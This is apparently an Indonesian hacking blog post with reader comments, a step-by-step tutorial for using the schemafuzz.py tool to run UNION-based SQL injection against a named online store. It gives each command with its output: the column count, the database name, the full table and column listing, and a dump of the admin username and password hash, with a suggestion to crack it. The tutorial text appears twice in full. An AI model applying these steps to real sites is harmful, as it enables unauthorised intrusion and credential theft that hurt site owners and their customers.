Bahan-bahan yg harus disiapkan :
1.Python
2.Schemafuzzz.py
3.CMD
Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u "target" --perintah
Utk lebih jelasnya,,langsung ke TKP ,, wkwkwkwk
1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923
2.Cek columnnya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol
maka akan keluar :
+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
+] Evasion Used: "+" "--"
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns...
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SEL
CT+0,1,2,3,4,5,6--
+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
-] Done!
Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6 utk nginject.
3.Cari db nya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dbs
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] ??sleeppo_store?
[-] 09:57:00
[-] Total URL Requests 3
[-] Done
Tuh kan keliatan db nya,,wkwkwkkw sleeppo_store
4.Cari nama tabel dalam db
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20
[Database]: sleeppo_store
[Table: Columns]
[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty
[-] 10:24:51
[-] Total URL Requests 139
[-] Done
Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p
5.Exploit tabel n kolom
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3
[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data
[-] 10:37:36
[-] Total URL Requests 5
[-] Done
xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aje wink
Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
ex : schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --fuzz
Beberapa perintah :
--fuzz >>> mencari nama kolom n tabel pada sql v 4
--schema >>> melihat nama tabel
--dump >>> melihat isi kolom
--findcol >>> menemukan dakc0de ( colom )
Silahkan cari yg laen.Baca aja help nya
link :
Python
Schemafuzz.py
1.Python
2.Schemafuzzz.py
3.CMD
Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u "target" --perintah
Utk lebih jelasnya,,langsung ke TKP ,, wkwkwkwk
1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923
2.Cek columnnya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol
maka akan keluar :
+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
+] Evasion Used: "+" "--"
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns...
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.ph … +UNION+SEL
CT+0,1,2,3,4,5,6--
+] darkc0de URL: http://www.sleeppost.com/viewproduct.ph … +1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
-] Done!
Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6 utk nginject.
3.Cari db nya
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dbs
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] ??sleeppo_store?
[-] 09:57:00
[-] Total URL Requests 3
[-] Done
Tuh kan keliatan db nya,,wkwkwkkw sleeppo_store
4.Cari nama tabel dalam db
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20
[Database]: sleeppo_store
[Table: Columns]
[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty
[-] 10:24:51
[-] Total URL Requests 139
[-] Done
Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p
5.Exploit tabel n kolom
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword
[+] URL: http://www.sleeppost.com/viewproduct.ph … N+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3
[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data
[-] 10:37:36
[-] Total URL Requests 5
[-] Done
xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aje wink
Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
ex : schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --fuzz
Beberapa perintah :
--fuzz >>> mencari nama kolom n tabel pada sql v 4
--schema >>> melihat nama tabel
--dump >>> melihat isi kolom
--findcol >>> menemukan dakc0de ( colom )
Silahkan cari yg laen.Baca aja help nya
link :
Python
Schemafuzz.py
2 comments:
ya bisa aja lah dijebol..tuh web khan bikinan lo..! gw juga bisa unjuk gigi macem tuh.!
by hexa
Thx agan atas tutorialnya....akan saya coba pelajari lagi biar pintar seperti agan...
Post a Comment